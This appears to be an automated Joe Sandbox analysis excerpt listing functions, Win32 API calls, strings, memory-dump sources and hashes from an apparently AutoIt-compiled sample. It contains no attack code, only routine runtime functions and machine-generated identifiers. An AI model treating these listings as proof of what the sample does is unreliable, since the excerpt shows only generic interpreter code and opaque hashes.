                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __snwprintf_memmove
                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                  • API String ID: 3506404897-2584243854
                                                                  • Opcode ID: d84e3c053012345ec7d57b02cbe94fac248941d4ac5ed5bf3c01228d457194f5
                                                                  • Instruction ID: bffed1e8df571d2772eb3e954a6a5652ad8890181a3a9c7eeab92dfa3e95c4a4
                                                                  • Opcode Fuzzy Hash: d84e3c053012345ec7d57b02cbe94fac248941d4ac5ed5bf3c01228d457194f5
                                                                  • Instruction Fuzzy Hash: 12218F31A0421DAACF10EFA8CC92EAE77B9FF85300F404455E545E7181DB30EA45DBA2
                                                                  Function 009766D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00976761
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0097676C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Combobox
                                                                  • API String ID: 3850602802-2096851135
                                                                  • Opcode ID: 6cc462f90c28a056fed23c3de7bafbc390e6f55d11e1e9fcdbac0c408d9ada42
                                                                  • Instruction ID: ca16f8af27939931cd8598cf2cd1f9568151da1930f0f4f18d0f74d1b4548b77
                                                                  • Opcode Fuzzy Hash: 6cc462f90c28a056fed23c3de7bafbc390e6f55d11e1e9fcdbac0c408d9ada42
                                                                  • Instruction Fuzzy Hash: 2011B272300609AFEF199F54CC81EBB3B6EEB883A8F108129F91897290D6319C5187A0
                                                                  Function 00976C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008F1D73
                                                                    • Part of subcall function 008F1D35: GetStockObject.GDI32(00000011), ref: 008F1D87
                                                                    • Part of subcall function 008F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008F1D91
                                                                  • GetWindowRect.USER32(00000000,?), ref: 00976C71
                                                                  • GetSysColor.USER32(00000012), ref: 00976C8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                  • String ID: static
                                                                  • API String ID: 1983116058-2160076837
                                                                  • Opcode ID: c7170ba32bef7caa99550b82ce5c633e9f1b2ecae205a19b46808956cdd637db
                                                                  • Instruction ID: f11ae7a55cb942bc440caa94e49c50bfe3cd76913dc1fa8ef2ce014043e65b25
                                                                  • Opcode Fuzzy Hash: c7170ba32bef7caa99550b82ce5c633e9f1b2ecae205a19b46808956cdd637db
                                                                  • Instruction Fuzzy Hash: A0212C72614209AFDF05DFB8CC46AFA7BB8FB08314F044629FA99E2250D635E850DB60
                                                                  Function 00976920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 009769A2
                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009769B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: LengthMessageSendTextWindow
                                                                  • String ID: edit
                                                                  • API String ID: 2978978980-2167791130
                                                                  • Opcode ID: 5aed2997855246877e650788a7001f516959eb495670aad53453b899ba40cd07
                                                                  • Instruction ID: fb6122dacd10c4bb1cde061cba0ed1ad383885b75f7ce45da441962374083a62
                                                                  • Opcode Fuzzy Hash: 5aed2997855246877e650788a7001f516959eb495670aad53453b899ba40cd07
                                                                  • Instruction Fuzzy Hash: 6A118F72110608ABEF108E74DC55AFB3B6DEB453B8F508724FAA9A71E0C735DC90A760
                                                                  Function 009529AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00952A22
                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00952A41
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: dccacd415255ace89cedb2d870d80cd26ba8059e90cfd799ea5339574c616686
                                                                  • Instruction ID: 3dc5a8c001c5df24dbe1921bd24ea01ad06a443bc8d2ba8eeb68aa10a056d8f4
                                                                  • Opcode Fuzzy Hash: dccacd415255ace89cedb2d870d80cd26ba8059e90cfd799ea5339574c616686
                                                                  • Instruction Fuzzy Hash: 0A11D032A15214ABCF35EB99ED44BAA73ACAB46311F054121ED59E72D0D730AD0EC791
                                                                  Function 009621D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0096222C
                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00962255
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$OpenOption
                                                                  • String ID: <local>
                                                                  • API String ID: 942729171-4266983199
                                                                  • Opcode ID: 766f67d9732bb679151f4ce1e2b927b3c197c07bcbd9fb6cb8d491df34aca4be
                                                                  • Instruction ID: 13714902345787247ff9b9671d5af93abca79f880f7f5c112ea5075020de50c1
                                                                  • Opcode Fuzzy Hash: 766f67d9732bb679151f4ce1e2b927b3c197c07bcbd9fb6cb8d491df34aca4be
                                                                  • Instruction Fuzzy Hash: A6112570505A25BEDB2C8F118CA8EFBFBACFF06361F10862AF92456000D3706990E6F0
                                                                  Function 00948E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00948E73
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 372448540-1403004172
                                                                  • Opcode ID: b3568d74bfed0fa385c10578205649d65ec89bfefbdbd7cde37d65ecbd0d5810
                                                                  • Instruction ID: 7c6566c44e7b20f0fbd13da3e758a3b5e572a8b7c52d2d325967aec4162e99b2
                                                                  • Opcode Fuzzy Hash: b3568d74bfed0fa385c10578205649d65ec89bfefbdbd7cde37d65ecbd0d5810
                                                                  • Instruction Fuzzy Hash: EB01DEB1641218AB9B14FBB8CC52DFF776DFF42320B400A19F921A72E1EE355808D651
                                                                  Function 00958D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock_memmove
                                                                  • String ID: EA06
                                                                  • API String ID: 1988441806-3962188686
                                                                  • Opcode ID: 0e29aa25ae425a6d381db4f3573eb2b3ffb8a515baa2a63515d9f9500d1b3f16
                                                                  • Instruction ID: de17f73689dc6141cf9eee6867a0e7b4ee02953c7d26ba1e26ba788c8932f893
                                                                  • Opcode Fuzzy Hash: 0e29aa25ae425a6d381db4f3573eb2b3ffb8a515baa2a63515d9f9500d1b3f16
                                                                  • Instruction Fuzzy Hash: C201F9719042187EDB18CAA9C816FEEBBFCDB51301F00459AF552D21C1E879A6088BA0
                                                                  Function 00948CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00948D6B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 372448540-1403004172
                                                                  • Opcode ID: ddd26f518ead0e62add3ab988f1969fff1500ef4055b17b9640ead70761aa98f
                                                                  • Instruction ID: ac5d2d374071e9768827f7d2ac9eaa373fbec58ca83fb6b638082dffac3f23bb
                                                                  • Opcode Fuzzy Hash: ddd26f518ead0e62add3ab988f1969fff1500ef4055b17b9640ead70761aa98f
                                                                  • Instruction Fuzzy Hash: 5A01B171B41108ABDB14EBA4C952EFF77ACEF15300F100419B905A32D1DE145A0892A2
                                                                  Function 00948D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00948DEE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 372448540-1403004172
                                                                  • Opcode ID: e9b34b14d41f5ff7789d8928f09664bd9df91630b67a0d27b077c0264eda5497
                                                                  • Instruction ID: 0a0920331736e77baa6d848ee50cb5124b20adf558200274f103f2100729c56d
                                                                  • Opcode Fuzzy Hash: e9b34b14d41f5ff7789d8928f09664bd9df91630b67a0d27b077c0264eda5497
                                                                  • Instruction Fuzzy Hash: 2E018F71B46109ABDB15EAB8D992EFF77ACEF11300F100415F906A32D2DA254E08D2B2
                                                                  Function 00954F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp
                                                                  • String ID: #32770
                                                                  • API String ID: 2292705959-463685578
                                                                  • Opcode ID: 7404c4960d2c2c71d4d8771fa02be56ebfd49413f4f31e21db9a133d2c9f2acd
                                                                  • Instruction ID: bbe737a96f7b6b03283360a7866aad85d0d41f009f4c055936d75824c1aa7858
                                                                  • Opcode Fuzzy Hash: 7404c4960d2c2c71d4d8771fa02be56ebfd49413f4f31e21db9a133d2c9f2acd
                                                                  • Instruction Fuzzy Hash: 68E09233A042282AD720DA99AC49BA7F7ACEB85B71F000166FD04D6051E960AA9587E0
                                                                  Function 0092B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0092B314: _memset.LIBCMT ref: 0092B321
                                                                    • Part of subcall function 00910940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0092B2F0,?,?,?,008F100A), ref: 00910945
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,008F100A), ref: 0092B2F4
                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008F100A), ref: 0092B303
                                                                  Strings
                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0092B2FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                  • API String ID: 3158253471-631824599
                                                                  • Opcode ID: ecb0b4d5c0ab94c74658a5c6e190ea6ba7b46cf19081f167b8f71dbadf33d434
                                                                  • Instruction ID: 8667e363ec5c9e2c3223dc9555e4eb940b4ee11c64ca67fc85e02c37f4dc1527
                                                                  • Opcode Fuzzy Hash: ecb0b4d5c0ab94c74658a5c6e190ea6ba7b46cf19081f167b8f71dbadf33d434
                                                                  • Instruction Fuzzy Hash: 50E092702157158FD721DF68E9043467BE8FF40314F008A2CE456C7245EBB4D488CBA1
                                                                  Function 00947C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00947C82
                                                                    • Part of subcall function 00913358: _doexit.LIBCMT ref: 00913362
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Message_doexit
                                                                  • String ID: AutoIt$Error allocating memory.
                                                                  • API String ID: 1993061046-4017498283
                                                                  • Opcode ID: 7753b3cf920d6a34302cb48a178e39971768c2e3fa8d6492e917f5f621b9b84f
                                                                  • Instruction ID: c8ce2c9ba84f1b250665e16fd33d95b8c87367192654d74212e145f00017709b
                                                                  • Opcode Fuzzy Hash: 7753b3cf920d6a34302cb48a178e39971768c2e3fa8d6492e917f5f621b9b84f
                                                                  • Instruction Fuzzy Hash: B1D0123238831C36D11532E96C07FDA69488B85B56F144416BB48995D349D249D152E9
                                                                  Function 00931935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00931775
                                                                    • Part of subcall function 0096BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0093195E,?), ref: 0096BFFE
                                                                    • Part of subcall function 0096BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0096C010
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0093196D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                  • String ID: WIN_XPe
                                                                  • API String ID: 582185067-3257408948
                                                                  • Opcode ID: adf945743f65fa7e12b63164ca7ff8ded9f1f919b36f5169b8c16d50790f3c5f
                                                                  • Instruction ID: 4bb2dac10d97db2f751747ea8be40a1b14b83d44cb424510e70d2b9836c8b769
                                                                  • Opcode Fuzzy Hash: adf945743f65fa7e12b63164ca7ff8ded9f1f919b36f5169b8c16d50790f3c5f
                                                                  • Instruction Fuzzy Hash: 4BF0C97181810DDFDB15DBA1CA98AFCBBF8BB18305F580495E106B61A0D7759F84DF60
                                                                  Function 00975998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009759AE
                                                                  • PostMessageW.USER32(00000000), ref: 009759B5
                                                                    • Part of subcall function 00955244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009552BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: f44624b9bac0eb7dd51ba1be62a9f5d57736cbbc8400e89fb1e8d8bd2e474e8c
                                                                  • Instruction ID: 2ef940aaef9ca99e61cf08334bdc31a0dcae125ef216a000506d6cf821cb7759
                                                                  • Opcode Fuzzy Hash: f44624b9bac0eb7dd51ba1be62a9f5d57736cbbc8400e89fb1e8d8bd2e474e8c
                                                                  • Instruction Fuzzy Hash: 71D0A932384300BAE264BB309C1BF932610BB40B00F000828B609AA0D0C8E0A800C794
                                                                  Function 00975964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0097596E
                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00975981
                                                                    • Part of subcall function 00955244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009552BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: 3c351197f718f81fe0234e578bd097443b21454701b03c970ee5eee879b68a58
                                                                  • Instruction ID: c9651cf908829ff16f6e1e1981e01a54d57cb7904964f57bb3267bdfdbc103e0
                                                                  • Opcode Fuzzy Hash: 3c351197f718f81fe0234e578bd097443b21454701b03c970ee5eee879b68a58
                                                                  • Instruction Fuzzy Hash: 71D0C932798311B6E664BB709C2BFA76A14BB40B51F010829B659AA1D1D9E09840D794